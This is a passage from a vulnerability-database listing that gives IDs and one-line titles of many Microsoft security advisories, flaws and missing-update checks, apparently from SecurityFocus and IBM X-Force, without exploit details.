Advance Notification Multiple Vulnerabilities [67905] Microsoft June 2014 Advance Notification Multiple Vulnerabilities [67298] Microsoft May 2014 Advance Notification Multiple Vulnerabilities [66639] RETIRED: Microsoft April 2014 Advance Notification Multiple Vulnerabilities [66016] Microsoft March 2014 Notification Multiple Vulnerabilities [65426] Microsoft February 2014 Notification Multiple Vulnerabilities [64757] RETIRED: Microsoft January 2014 Advance Notification Multiple Vulnerabilities [64083] RETIRED: Microsoft December 2013 Advance Notification Multiple Vulnerabilities [63604] RETIRED: Microsoft November 2013 Advance Notification Multiple Vulnerabilities [62797] RETIRED: Microsoft October 2013 Advance Notification Multiple Vulnerabilities [62228] RETIRED: Microsoft September 2013 Advance Notification Multiple Vulnerabilities [62181] Microsoft Office Pinyin IME 2010 CVE-2013-3859 Local Privilege Escalation Vulnerability [61686] Microsoft August 2013 Advance Notification Multiple Vulnerabilities [60960] RETIRED: Microsoft July 2013 Advance Notification Multiple Vulnerabilities [60394] Microsoft June 2013 Advance Notification Multiple Vulnerabilities [59785] RETIRED: Microsoft May 2013 Advance Notification Multiple Vulnerabilities [58881] RETIRED: Microsoft April 2013 Advance Notification Multiple Vulnerabilities [58380] RETIRED: Microsoft March 2013 Advance Notification Multiple Vulnerabilities [57846] RETIRED: Microsoft February 2013 Advance Notification Multiple Vulnerabilities [57137] RETIRED: Microsoft January 2013 Advance Notification Multiple Vulnerabilities [56838] RETIRED: Microsoft December 2012 Advance Notification Multiple Vulnerabilities [56450] RETIRED: Microsoft November 2012 Advance Notification Multiple Vulnerabilities [56304] Microsoft Office Excel 2010 Memory Corruption Denial of Service Vulnerability [55794] RETIRED: Microsoft October 2012 Advance Notification Multiple Vulnerabilities [55472] RETIRED: Microsoft September 2012 Advance Notification Multiple Vulnerabilities [54944] RETIRED: Microsoft August 2012 Advance Notification Multiple Vulnerabilities [54318] RETIRED: Microsoft July 2012 Advance Notification Multiple Vulnerabilities [53862] RETIRED: Microsoft June 2012 Advance Notification Multiple Vulnerabilities [53372] RETIRED: Microsoft May 2012 Advance Notification Multiple Vulnerabilities [52910] RETIRED: Microsoft April 2012 Advance Notification Multiple Vulnerabilities [52366] RETIRED: Microsoft March 2012 Advance Notification Multiple Vulnerabilities [51944] RETIRED: Microsoft February 2012 Advance Notification Multiple Vulnerabilities [51289] RETIRED: Microsoft January 2012 Advance Notification Multiple Vulnerabilities [50980] RETIRED: Microsoft December 2011 Advance Notification Multiple Vulnerabilities [50513] RETIRED: Microsoft November 2011 Advance Notification Multiple Vulnerabilities [49994] RETIRED: Microsoft October 2011 Advance Notification Multiple Vulnerabilities [49515] RETIRED: Microsoft September 2011 Advance Notification Multiple Vulnerabilities [49017] RETIRED: Microsoft August 2011 Advance Notification Multiple Vulnerabilities [48616] RETIRED: Microsoft July 2011 Advance Notification Multiple Vulnerabilities [48235] Microsoft Lync Server 2010 'ReachJoin.aspx' Remote Command Injection Vulnerability [48193] RETIRED: Microsoft June 2011 Advance Notification Multiple Vulnerabilities [47725] RETIRED: Microsoft May 2011 Advance Notification Multiple Vulnerabilities [47255] RETIRED: Microsoft April 2011 Advance Notification Multiple Vulnerabilities [46675] RETIRED: Microsoft March 2011 Advance Notification Multiple Vulnerabilities [46132] RETIRED: Microsoft February 2011 Advance Notification Multiple Vulnerabilities [45696] RETIRED: Microsoft January 2011 Advance Notification Multiple Vulnerabilities [45307] RETIRED: Microsoft December 2010 Advance Notification Multiple Vulnerabilities [44649] RETIRED: Microsoft November 2010 Advance Notification Multiple Vulnerabilities [43831] RETIRED: Microsoft October 2010 Advance Notification Multiple Vulnerabilities [43115] RETIRED: Microsoft September 2010 Advance Notification Multiple Vulnerabilities [42234] RETIRED: Microsoft August 2010 Advance Notification Multiple Vulnerabilities [41474] RETIRED: Microsoft July 2010 Advance Notification Multiple Vulnerabilities [40548] RETIRED: Microsoft June 2010 Advance Notification Multiple Vulnerabilities [39961] RETIRED: Microsoft May 2010 Advance Notification Multiple Vulnerabilities [39313] RETIRED: Microsoft April 2010 Advance Notification Multiple Vulnerabilities [38540] RETIRED: Microsoft March 2010 Advance Notification Multiple Vulnerabilities [38096] RETIRED: Microsoft February 2010 Advance Notification Multiple Vulnerabilities [37887] RETIRED: Microsoft January 2010 Advance Notification Multiple Vulnerabilities [37664] RETIRED: Microsoft January 2010 Advance Notification Multiple Vulnerabilities [32642] Microsoft Word RTF Malformed Control Word Variant 2 Remote Code Execution Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [82417] Microsoft Windows Knowledge Base Article 2801261 update is not installed [82415] Microsoft Windows Knowledge Base Article 2807986 update is not installed [82410] Microsoft Windows Knowledge Base Article 2809289 update is not installed [81859] Microsoft Windows Knowledge Base Article 2802968 update is not installed [81857] Microsoft Windows Knowledge Base Article 2809279 update is not installed [81668] Microsoft Windows Knowledge Base Article 2800277 update is not installed [77323] Microsoft Windows Knowledge Base Article 2706045 update is not installed [75949] Microsoft Windows Knowledge Base Article 2707960 update is not installed [75942] Microsoft Windows Knowledge Base Article 2706726 update is not installed [75934] Microsoft Windows Knowledge Base Article 2709162 update is not installed [75926] Microsoft Windows Knowledge Base Article 2709100 update is not installed [75905] Microsoft Windows Knowledge Base Article 2707956 update is not installed [71991] Microsoft Windows Knowledge Base Article 2607664 update is not installed [71542] Microsoft Windows Knowledge Base Article 2607702 update is not installed [70945] Microsoft Windows Knowledge Base Article 2603381 update is not installed [70150] Microsoft Windows Knowledge Base Article 2607670 update is not installed [67755] Microsoft Windows Knowledge Base Article 2503665 update is not installed [67749] Microsoft Windows Knowledge Base Article 2507938 update is not installed [66845] Microsoft Windows Knowledge Base Article 2506014 update is not installed [66844] Microsoft Windows Knowledge Base Article 2501584 update is not installed [66448] Microsoft Windows Knowledge Base Article 2508272 update is not installed [66442] Microsoft Windows Knowledge Base Article 2509553 update is not installed [66440] Microsoft Windows Knowledge Base Article 2508429 update is not installed [66438] Microsoft Windows Knowledge Base Article 2507618 update is not installed [66430] Microsoft Windows Knowledge Base Article 2503658 update is not installed [66425] Microsoft Windows Knowledge Base Article 2506223 update is not installed [65570] Microsoft Windows Knowledge Base Article 2500212 update is not installed [65568] Microsoft Windows Knowledge Base Article 2508062 update is not installed [63840] Microsoft Visual C++ 2008 Redistributable Package dynamic-linked library (DLL) code execution [63780] Microsoft PowerPoint 2007 dynamic-linked library (rpawinet.dll) code execution [63775] Microsoft Visio 2003 dynamic-linked library (mfc71enu.dll) code execution [63586] Microsoft Windows Knowledge Base Article 2207559 update is not installed [63573] Microsoft Windows Knowledge Base Article 2407132 update is not installed [62797] Microsoft Windows Knowledge Base Article 2305420 update is not installed [62149] Microsoft Windows Knowledge Base Article 2207566 update is not installed [62133] Microsoft Windows Knowledge Base Article 2405882 update is not installed [53980] Microsoft Windows 2000 License Logging Server buffer overflow [53601] Microsoft Office 2008 for Mac user ID 502 security bypass [50973] Microsoft Windows Server 2003 and Vista win32k.sys denial of service [50759] Microsoft Windows 2000 Active Directory LDAP code execution [48595] Microsoft Word 2007 Email as PDF information disclosure [46102] Microsoft Windows 2003 SP2 is not installed on the system [46101] Microsoft Windows 2003 SP1 is not installed on the system [45186] Microsoft SQL Server 2000 SQLVDIRLib.SQLVDirControl ActiveX control buffer overflow [37200] Microsoft SQL Server 2000 Service Pack 1 update is not installed [37198] Microsoft SQL Server 2000 Service Pack 3 update is not installed [34634] Microsoft Windows Server 2003 Active Directory information disclosure [34599] Microsoft Windows Server 2003 terminal server security bypass [34473] Microsoft Office 2000 ActiveX control buffer overflow [33713] Microsoft Word 2007 multiple unspecified denial of service [33712] Microsoft Word 2007 wwlib.dll buffer overflow [32631] Microsoft SQL Server 2000 Service Pack 2 update is not installed [31821] Microsoft Windows time zone update for year 2007 [31196] Microsoft Office 2003 Brazilian Grammar Checker buffer overflow [30905] Microsoft Project Server 2003 pdsrequest.asp information disclosure [29546] Microsoft Windows 2000/2003 user logoff initiated [29545] Microsoft Windows 2000/2003 system time changed [29544] Microsoft Windows 2000/2003 system security access removed [29543] Microsoft Windows 2000/2003 security access granted [29542] Microsoft Windows 2000/2003 SAM notification package loaded [29541] Microsoft Windows 2000/2003 primary security token issued [29540] Microsoft Windows 2000/2003 user password reset successful [29539] Microsoft Windows 2000/2003 object indirectly accessed [29538] Microsoft Windows 2000/2003 object handle duplicated [29537] Microsoft Windows 2000/2003 logon with explicit credentials success [29536] Microsoft Windows 2000/2003 logon attempt using explicit credentials unsuccessful [29535] Microsoft Windows 2000/2003 IPSEC policy agent failed [29534] Microsoft Windows 2000/2003 IPSEC policy agent disabled [29533] Microsoft Windows 2000/2003 IPSEC policy agent changed [29532] Microsoft Windows 2000/2003 IKE security association established [29531] Microsoft Windows 2000/2003 IKE quick mode association ended [29530] Microsoft Windows 2000/2003 IKE main mode association ended [29529] Microsoft Windows 2000/2003 IKE association negotiation failed [29528] Microsoft Windows 2000/2003 IKE association peer authentication failed [29527] Microsoft Windows 2000/2003 IKE association failed invalid proposal [29526] Microsoft Windows 2000/2003 IKE association failed authentication parameters [29525] Microsoft Windows 2000/2003 DPAPI master key backup attempted [29524] Microsoft Windows 2000/2003 DPAPI key recovery attempted [29523] Microsoft Windows 2000/2003 DPAPI auditable data unprotected [29522] Microsoft Windows 2000/2003 administrative group security descriptor set [29521] Microsoft Windows 2000/2003 account name changed [29507] Microsoft Office 2003 unspecified PowerPoint NULL pointer dereference denial of service [28512] Microsoft Internet Explorer multiple Windows 2000 COM object denial of service [28005] Microsoft Windows 2000 Management Console (MMC) resource file cross-site scripting [26118] Microsoft Office 2003 mailto: information disclosure [25330] Microsoft Commerce Server 2002 authfiles/login.asp authentication bypass [24474] Microsoft Windows 2000 LDAP client accepts untrusted CA [24473] Microsoft Windows 2000 event ID 565 not logged [24472] Microsoft Windows 2000 Event ID 1704 records incorrect group policy settings [24407] Microsoft Windows 2000 SECEDIT command fails to set ACLs correctly [24405] Microsoft Windows 2000 UPN credentials with trailing dot group policy bypass [24403] Microsoft Windows 2000 WideCharToMultiByte() incorrect Japanese character conversion [24402] Microsoft Windows 2000 Terminal Service client IP not logged [24400] Microsoft Windows 2000 domain authentication can be bypassed by a local administrator [23066] Microsoft Windows XP and 2000 Server MSRPC memory allocation denial of service [22318] Microsoft SQL Server 2000 Service Pack 4 update is not installed [22183] Microsoft Exchange Server 2003 public folder denial of service [21345] Microsoft Windows 2000 Update Rollup 1 for Service Pack 4 has not been installed [21315] Microsoft Outlook 2002 connector for Domino bypass restrictions [19969] Multiple Microsoft Windows Server 2003 Edition printer driver denial of service [19965] Multiple Microsoft Windows Server 2003 Editions SMB redirector denial of service [19727] Microsoft Windows 2000 GDI32.DLL denial of service [19629] Microsoft Exchange Server 2003 folder denial of service [17826] Microsoft Outlook 2003 CID security bypass [17624] Microsoft Windows XP and Windows Server 2003 Compressed Folders buffer overflow [17621] Microsoft Windows 2003 SMTP service code execution [17560] Microsoft Windows 2000 and XP GDI library denial of service [17521] Microsoft Windows 2000 Service Pack 4 is not installed [16913] Microsoft Windows 2003 users with Synchronize directory service data privilege [16912] Microsoft Windows 2003 groups with Synchronize directory service data privilege [16909] Microsoft Windows 2003 groups with Remove computer from docking station privilege [16907] Microsoft Windows 2003 users with Create global objects privilege [16905] Microsoft Windows 2003 users or groups with Create global objects privilege [16851] Microsoft Windows 2003 and XP WinKey and U key denial of service [16704] Microsoft Windows 2000 Media Player control code execution [16582] Microsoft Windows Server 2003 kernel CPU denial of service [16572] Microsoft Windows 2003 Users with Impersonate a client after authentication privilege [16570] Microsoft Windows 2003 Users with Create global objects privilege [16564] Microsoft Windows 2003 Groups with Create global objects privilege [16562] Microsoft Windows 2003 Groups with &quot [16522] Microsoft Windows 2003 Impersonate a client after authentication privilege [16521] Microsoft Windows 2003 Deny Logon Through Terminal Services privilege [16520] Microsoft Windows 2003 Create global objects privilege [16276] Microsoft Windows 2000 Advanced Server fully qualified domain name security bypass [16173] Microsoft Outlook 2003 OLE object bypass restricted security zone [16119] Microsoft Outlook 2000 URL spoofing [16104] Microsoft Outlook 2003 predictable file location could allow code execution [16095] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15704] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15700] Microsoft Windows 2000 Domain Controller LSASS LDAP message denial of service [15632] Microsoft Windows 2000 Utility Manger allows privilege escalation [15414] Microsoft Outlook 2002 mailto URL allows execution of code [15263] Microsoft Windows XP and 2000 Server kernel allows elevated privileges [15057] Microsoft Windows XP and Windows Server 2003 smbmount Linux client denial of service [15038] Microsoft Windows 2000 Server Windows Media Services denial of service [15037] Microsoft Windows Server 2003 WINS /GS flag denial of service [14178] Microsoft ISA Exchange Server 2003 MS04-002 patch is not installed [14167] Microsoft ISA Server 2000 H.323 filter buffer overflow [13426] Microsoft Windows 2000 and XP RPC race condition [13423] Microsoft Windows 2000 Local Troubleshooter ActiveX control buffer overflow [13407] Microsoft Windows 2000 Server mqsvc.exe MQLocateBegin packet buffer overflow [13385] Microsoft Windows Server 2003 &quot [13211] Microsoft Windows 2000 and XP URG memory leak [13171] Microsoft Windows Server 2003 can allow attacker to bypass mechanism used to detect buffer overflows [13131] Microsoft Windows 2000 Message Queue Manager buffer overflow [12684] Microsoft Exchange Server OWA Outlook 2003 denial of service [12652] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension POST request buffer overflow [12620] Microsoft Windows 2000 Server SMTP FILETIME denial of service [12543] Microsoft Windows 2000 Accessibility Utility Manager could allow an attacker to gain privileges [12493] Microsoft Windows Shell32.dll 2000 ShellExecute function buffer overflow [12489] Microsoft Windows 2000 Server Active Directory buffer overflow [12128] Microsoft Windows 2000 and Windows NT MS03-019 patch is not installed [12092] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension buffer overflow [12048] Microsoft Windows 2000 and Windows Server 2003 LAN Manager hash creation enabled [11901] Microsoft BizTalk Server 2002 SQL injection [11900] Microsoft BizTalk Server 2002 HTTP Receiver function buffer overflow [11816] Microsoft Windows 2000 Terminal Services MSGINA.DLL insecure access permissions [11696] Microsoft Windows 2000 Terminal Services man-in-the-middle attack [11617] Microsoft Windows 2000 MS03-007 patch is not installed on the system [11546] Microsoft Windows 2000 Windows Help Facility .cnt file buffer overflow [11329] Microsoft Windows NT and 2000 cmd.exe CD path name buffer overflow [11274] Microsoft Windows 2000 NetBIOS continuation packets denial of service [11273] Microsoft Windows 2000 RPC service could allow an attacker to gain elevated privileges [11216] Microsoft Windows NT and 2000 command prompt denial of service [11141] Microsoft Windows 2000 Terminal Services MSGINA.DLL denial of service [11133] Microsoft Outlook 2002 using V1 Exchange Server Security certificates transmits plaintext emails [10843] Microsoft Windows 2000 and XP SMB signing group policy modification [10431] Microsoft Windows 2000 SNMP LANMAN Extension memory leak denial of service [10400] Microsoft Windows 2000 RPC TCP port 135 denial of service [10377] Microsoft Windows XP and 2000 administrative alerts fail when security event log is full [10199] Microsoft Windows 2000/XP PPTP packet buffer overflow [10195] Microsoft FrontPage Server Extensions (FPSE) 2002 SmartHTML Interpreter buffer overflow [10194] Microsoft FrontPage Server Extensions (FPSE) 2000 SmartHTML Interpreter denial of service [9946] Microsoft Windows 2000 Terminal Services session screensaver fails to lock the console [9856] Microsoft Windows 2000 NCM handler routine could allow elevated privileges [9779] Microsoft Windows 2000 weak system partition permissions [9752] Microsoft Windows 2000 Service Pack 3 is not installed [9746] Microsoft Windows 2000 HTML Help item parameter buffer overflow [9625] Microsoft Windows 2000 Narrator allows login information to be audible [9154] Microsoft Data Engine (MSDE) and Microsoft SQL Server 2000 Desktop Engine have a default blank &quot [8867] Microsoft Windows 2000 LanMan denial of service [8813] Microsoft Windows 2000 Terminal Services allows attacker to bypass group policy settings [8759] Microsoft Windows 2000 could allow an attacker to block the application of Group Policy settings [8752] Microsoft Windows NT, 2000, and XP MUP buffer overflow [8739] Microsoft Windows 2000 DCOM memory leak [8708] Microsoft Outlook 2000 and 2002 executes embedded script in object tag when replying or forwarding HTML mail [8402] Microsoft Windows 2000 allows an attacker to bypass password policy [8307] Microsoft Windows 2000, Windows XP, and Exchange 2000 SMTP data transfer command denial of service [8304] Microsoft Windows 2000 and Exchange 5.5 SMTP service unauthorized mail privileges [8254] Microsoft Commerce Server 2000 AuthFilter ISAPI filter buffer overflow [8199] Microsoft Windows 2000 Terminal Services unlocked client [8094] Microsoft Windows 2000 and Interix 2.2 Telnet protocol option buffer overflow [8092] Microsoft Exchange 2000 System Attendant sets incorrect registry permissions [8043] Microsoft Windows NT, 2000, and XP using NTFS could allow files to be hidden [8037] Microsoft Windows 2000 empty TCP packet denial of service [8023] Microsoft Windows NT and Windows 2000 SIDs could allow an attacker to gain elevated privileges in another domain [7919] Microsoft IIS 4.0 and Norton Internet Security 2001 default permissions could allow an attacker to modify log files [7667] Microsoft Windows 2000 IKE UDP packet flood denial of service [7566] Microsoft IIS 2.0 and 3.0 upgraded to Microsoft IIS 4.0 fails to remove the ism.dll file [7538] Microsoft Windows 2000 and XP Terminal services allow an attacker to spoof IP addresses [7533] Microsoft Windows 2000 RunAs service denial of service [7532] Microsoft Windows 2000 RunAs service allows local attacker to bypass pipe authentication [7531] Microsoft Windows 2000 RunAs service reveals sensitive information [7528] Microsoft Windows NT and Windows 2000 malformed RPC request denial of service [7409] Microsoft Windows 2000 and Windows XP GDI denial of service [7302] Microsoft Windows NT and 2000 Terminal Server malformed RDP packet series denial of service [7008] Microsoft Windows 2000 IrDA device denial of service [6977] Microsoft Windows NT and 2000 NNTP memory leak denial of service [6931] Microsoft Windows 2000 without Service Pack 2 [6919] Microsoft Windows 2000 Task Manager does not terminate malicious files with the same name as a system process [6912] Microsoft Windows NT and 2000 Terminal Server RDP memory leak denial of service [6876] Microsoft Windows 2000 could allow an attacker to change network passwords [6803] Microsoft Windows 2000 SMTP service allows mail relaying [6745] Microsoft Windows 2000 LDAP function could allow domain user password change [6669] Microsoft Windows 2000 Telnet system call denial of service [6668] Microsoft Windows 2000 Telnet handle leak denial of service [6667] Microsoft Windows 2000 Telnet multiple idle sessions denial of service [6666] Microsoft Windows 2000 Telnet username denial of service [6665] Microsoft Windows 2000 Telnet service weak domain authentication [6664] Microsoft Windows 2000 Telnet service predictable pipe names could allow elevation of privileges [6652] Microsoft Exchange 2000 OWA script execution [6590] Microsoft Windows 2000 debug registers allow attacker to gain elevated privileges [6506] Microsoft Windows 2000 Server Kerberos denial of service [6443] Microsoft Windows 2000 catalog file could remove installed hotfixes [6160] Microsoft Windows 2000 event viewer buffer overflow [6136] Microsoft Windows 2000 domain controller denial of service [6035] Microsoft Windows 2000 Server RDP denial of service [5973] Microsoft Windows 2000 EFS allows local user to recover sensitive data [5936] Microsoft Windows 2000 Server Directory Service Restore Mode allows user to login with blank password [5800] Microsoft Windows 2000 Index Service ActiveX controls allow unauthorized access to file information [5623] Microsoft Windows NT and 2000 Phone Book service buffer overflow [5598] Microsoft Windows 2000 Telnet daemon could allow a denial of service [5585] Microsoft Windows 2000 brute force attack [5502] Microsoft Windows 2000 Indexing Services ixsso.query [5467] Microsoft Windows 2000 System Monitor ActiveX control buffer overflow [5399] Microsoft Windows NT and 2000 Network Monitor buffer overflow [5301] Microsoft Windows 2000 Simplified Chinese IME State Recognition [5263] Microsoft Office 2000 executes .dll without users knowledge [5242] Microsoft Windows 2000 Telnet client NTLM authentication weakness [5222] Microsoft Windows 2000 malformed RPC packet denial of service [5203] Microsoft Windows 2000 still image service [5171] Microsoft Windows 2000 Local Security Policy corruption [5080] Microsoft Office 2000 HTML object tag buffer overflow [5033] Microsoft Windows 2000 without Service Pack 1 [5031] Microsoft Windows 2000 Service Control Manager named pipe could allow a unauthorized user to gain privileges [5015] Microsoft Windows NT and 2000 executable path [4887] Microsoft Windows 2000 Kerberos ticket renewed [4886] Microsoft Windows 2000 logon session reconnected [4885] Microsoft Windows 2000 logon session disconnected [4882] Microsoft Windows 2000 Kerberos pre-authentication failed [4873] Microsoft Windows 2000 user account mapped for logon [4872] Microsoft Windows 2000 account logon failed [4871] Microsoft Windows 2000 account used for logon [4855] Microsoft Windows 2000 group type change [4842] Microsoft Internet Explorer and Microsoft Powerpoint 2000 ActiveX object execution [4841] Microsoft Internet Explorer and Microsoft Access 2000 VBA code execution [4823] Microsoft Windows 2000 Telnet server binary stream denial of service [4819] Microsoft Windows 2000 default SYSKEY configuration [4787] Microsoft Windows 2000 user account locked out [4786] Microsoft Windows 2000 computer account created [4785] Microsoft Windows 2000 computer account changed [4784] Microsoft Windows 2000 computer account deleted [4714] Microsoft Windows 2000 &quot [4589] Microsoft Windows 2000 protected store can be compromised by brute force attack [4278] Microsoft Windows 2000 unattended install does not secure All Users profile [4138] Microsoft Windows 2000 system file integrity feature is disabled [4086] Microsoft Windows 2000 may not start Jaz drives correctly [4085] Microsoft Windows 2000 non-Gregorial calendar error [4084] Microsoft Windows 2000 may prevent Adobe FrameMaker files from being saved in some formats [4083] Microsoft Windows 2000 Terminal Services may damage Office files saved as HTML [4082] Microsoft Windows 2000 and Iomega parallel port drives display error [4080] Microsoft Windows 2000 AOL image support [4079] Microsoft Windows 2000 High Encryption Pack [3854] Microsoft Office 2000 security setting [1376] Microsoft Proxy 2.0 denial of service [86256] Microsoft Windows Knowledge Base Article 2876063 update is not installed [86097] Microsoft Windows Knowledge Base Article 2859537 update is not installed [86091] Microsoft Windows Knowledge Base Article 2868623 update is not installed [86089] Microsoft Windows Knowledge Base Article 2862772 update is not installed [86075] Microsoft Windows Knowledge Base Article 2850869 update is not installed [86073] Microsoft Windows Knowledge Base Article 2873872 update is not installed [86070] Microsoft Windows Knowledge Base Article 2849568 update is not installed [85245] Microsoft Windows Knowledge Base Article 2848295 update is not installed [85244] Microsoft Windows Knowledge Base Article 2847927 update is not installed [85243] Microsoft Windows Knowledge Base Article 2861561 update is not installed [85236] Microsoft Windows Knowledge Base Article 2850851 update is not installed [85227] Microsoft Windows Knowledge Base Article 2847883 update is not installed [85223] Microsoft Windows Knowledge Base Article 2846071 update is not installed [85205] Microsoft Windows Knowledge Base Article 2845187 update is not installed [84621] Microsoft Windows Knowledge Base Article 2845690 update is not installed [84619] Microsoft Windows Knowledge Base Article 2839894 update is not installed [84617] Microsoft Windows Knowledge Base Article 2839571 update is not installed [84615] Microsoft Windows Knowledge Base Article 2839229 update is not installed [84613] Microsoft Windows Knowledge Base Article 2838727 update is not installed [84156] Microsoft Windows Knowledge Base Article 2847204 update is not installed [83912] Microsoft Windows Knowledge Base Article 2829254 update is not installed [83910] Microsoft Windows Knowledge Base Article 2829530 update is not installed [83898] Microsoft Windows Knowledge Base Article 2830397 update is not installed [83886] Microsoft Windows Knowledge Base Article 2830399 update is not installed [83884] Microsoft Windows Knowledge Base Article 2834692 update is not installed [83882] Microsoft Windows Knowledge Base Article 2834695 update is not installed [83880] Microsoft Windows Knowledge Base Article 2836440 update is not installed [83876] Microsoft Windows Knowledge Base Article 2840221 update is not installed [83192] Microsoft Windows Knowledge Base Article 2817183 update is not installed [83100] Microsoft Windows Knowledge Base Article 2830914 update is not installed [83098] Microsoft Windows Knowledge Base Article 2829996 update is not installed [83093] Microsoft Windows Knowledge Base Article 2828223 update is not installed [83091] Microsoft Windows Knowledge Base Article 2813170 update is not installed [83088] Microsoft Windows Knowledge Base Article 2827663 update is not installed [83086] Microsoft Windows Knowledge Base Article 2823482 update is not installed [83084] Microsoft Windows Knowledge Base Article 2821818 update is not installed [83082] Microsoft Windows Knowledge Base Article 2820917 update is not installed [82600] Microsoft Windows Knowledge Base Article 2813707 update is not installed [82424] Microsoft Windows Knowledge Base Article 2814124 update is not installed [82422] Microsoft Windows Knowledge Base Article 2780176 update is not installed [82401] Microsoft Windows Knowledge Base Article 2813682 update is not installed [82399] Microsoft Windows Knowledge Base Article 2816264 update is not installed [81683] Microsoft Windows Knowledge Base Article 2780091 update is not installed [81681] Microsoft Windows Knowledge Base Article 2784242 update is not installed [81680] Microsoft Windows Knowledge Base Article 2790113 update is not installed [81678] Microsoft Windows Knowledge Base Article 2790655 update is not installed [81676] Microsoft Windows Knowledge Base Article 2790978 update is not installed [81674] Microsoft Windows Knowledge Base Article 2797052 update is not installed [81672] Microsoft Windows Knowledge Base Article 2799494 update is not installed [81666] Microsoft Windows Knowledge Base Article 2778344 update is not installed [81634] Microsoft Windows Knowledge Base Article 2792100 update is not installed [81339] Microsoft Windows Knowledge Base Article 2799329 update is not installed [80875] Microsoft Windows Knowledge Base Article 2756145 update is not installed [80872] Microsoft Windows Knowledge Base Article 2769324 update is not installed [80867] Microsoft Windows Knowledge Base Article 2769327 update is not installed [80865] Microsoft Windows Knowledge Base Article 2769369 update is not installed [80863] Microsoft Windows Knowledge Base Article 2778930 update is not installed [80861] Microsoft Windows Knowledge Base Article 2785220 update is not installed [80365] Microsoft Windows Knowledge Base Article 2761465 update is not installed [80360] Microsoft Windows Knowledge Base Article 2765809 update is not installed [80358] Microsoft Windows Knowledge Base Article 2770660 update is not installed [80356] Microsoft Windows Knowledge Base Article 2780642 update is not installed [80352] Microsoft Windows Knowledge Base Article 2783534 update is not installed [80349] Microsoft Windows Knowledge Base Article 2784126 update is not installed [79693] Microsoft Windows Knowledge Base Article 2745030 update is not installed [79687] Microsoft Windows Knowledge Base Article 2761451 update is not installed [79683] Microsoft Windows Knowledge Base Article 2761226 update is not installed [79679] Microsoft Windows Knowledge Base Article 2758857 update is not installed [79677] Microsoft Windows Knowledge Base Article 2727528 update is not installed [78864] Microsoft Windows Knowledge Base Article 2754670 update is not installed [78862] Microsoft Windows Knowledge Base Article 2743555 update is not installed [78858] Microsoft Windows Knowledge Base Article 2754849 update is not installed [78856] Microsoft Windows Knowledge Base Article 2724197 update is not installed [78853] Microsoft Windows Knowledge Base Article 2741517 update is not installed [78851] Microsoft Windows Knowledge Base Article 2742319 update is not installed [78848] Microsoft Windows Knowledge Base Article 2742321 update is not installed [78760] Microsoft Windows Knowledge Base Article 2744842 update is not installed [78077] Microsoft Windows Knowledge Base Article 2741528 update is not installed [78075] Microsoft Windows Knowledge Base Article 2720184 update is not installed [78071] Microsoft Windows Knowledge Base Article 2748552 update is not installed [77512] Microsoft Windows Knowledge Base Article 2740358 update is not installed [77362] Microsoft Windows Knowledge Base Article 2733918 update is not installed [77360] Microsoft Windows Knowledge Base Article 2733829 update is not installed [77357] Microsoft Windows Knowledge Base Article 2733594 update is not installed [77352] Microsoft Windows Knowledge Base Article 2731879 update is not installed [77350] Microsoft Windows Knowledge Base Article 2731847 update is not installed [77348] Microsoft Windows Knowledge Base Article 2723135 update is not installed [77346] Microsoft Windows Knowledge Base Article 2722913 update is not installed [77342] Microsoft Windows Knowledge Base Article 2720573 update is not installed [77325] Microsoft Windows Knowledge Base Article 2719584 update is not installed [76808] Microsoft Windows Knowledge Base Article 2721015 update is not installed [76725] Microsoft Windows Knowledge Base Article 2722479 update is not installed [76724] Microsoft Windows Knowledge Base Article 2719177 update is not installed [76721] Microsoft Windows Knowledge Base Article 2718523 update is not installed [76718] Microsoft Windows Knowledge Base Article 2698365 update is not installed [76711] Microsoft Windows Knowledge Base Article 2695502 update is not installed [76704] Microsoft Windows Knowledge Base Article 2691442 update is not installed [76702] Microsoft Windows Knowledge Base Article 2655992 update is not installed [75963] Microsoft Windows Knowledge Base Article 2699988 update is not installed [75939] Microsoft Windows Knowledge Base Article 2685939 update is not installed [75928] Microsoft Windows Knowledge Base Article 2711167 update is not installed [75136] Microsoft Windows Knowledge Base Article 2693777 update is not installed [75132] Microsoft Windows Knowledge Base Article 2690533 update is not installed [75130] Microsoft Windows Knowledge Base Article 2688338 update is not installed [75127] Microsoft Windows Knowledge Base Article 2681578 update is not installed [75123] Microsoft Windows Knowledge Base Article 2680352 update is not installed [75116] Microsoft Windows Knowledge Base Article 2597981 update is not installed [74556] Microsoft Windows Knowledge Base Article 2639185 update is not installed [74384] Microsoft Windows Knowledge Base Article 2675157 update is not installed [74378] Microsoft Windows Knowledge Base Article 2671605 update is not installed [74373] Microsoft Windows Knowledge Base Article 2664258 update is not installed [74369] Microsoft Windows Knowledge Base Article 2663860 update is not installed [73543] Microsoft Windows Knowledge Base Article 2671387 update is not installed [73540] Microsoft Windows Knowledge Base Article 2665364 update is not installed [73538] Microsoft Windows Knowledge Base Article 2651019 update is not installed [73536] Microsoft Windows Knowledge Base Article 2651018 update is not installed [73533] Microsoft Windows Knowledge Base Article 2647170 update is not installed [73530] Microsoft Windows Knowledge Base Article 2641653 update is not installed [72887] Microsoft Windows Knowledge Base Article 2663841 update is not installed [72873] Microsoft Windows Knowledge Base Article 2663830 update is not installed [72867] Microsoft Windows Knowledge Base Article 2663510 update is not installed [72857] Microsoft Windows Knowledge Base Article 2661637 update is not installed [72855] Microsoft Windows Knowledge Base Article 2660465 update is not installed [72853] Microsoft Windows Knowledge Base Article 2653956 update is not installed [72851] Microsoft Windows Knowledge Base Article 2654428 update is not installed [72849] Microsoft Windows Knowledge Base Article 2651026 update is not installed [72846] Microsoft Windows Knowledge Base Article 2647516 update is not installed [72841] Microsoft Windows Knowledge Base Article 2645640 update is not installed [72838] Microsoft Windows Knowledge Base Article 2643719 update is not installed [72029] Microsoft Windows Knowledge Base Article 2638420 update is not installed [72003] Microsoft Windows Knowledge Base Article 2646524 update is not installed [71998] Microsoft Windows Knowledge Base Article 2644615 update is not installed [71995] Microsoft Windows Knowledge Base Article 2643584 update is not installed [71994] Microsoft Windows Knowledge Base Article 2636391 update is not installed [71565] Microsoft Windows Knowledge Base Article 2648048 update is not installed [71562] Microsoft Windows Knowledge Base Article 2640241 update is not installed [71560] Microsoft Windows Knowledge Base Article 2640045 update is not installed [71558] Microsoft Windows Knowledge Base Article 2639417 update is not installed [71557] Microsoft Windows Knowledge Base 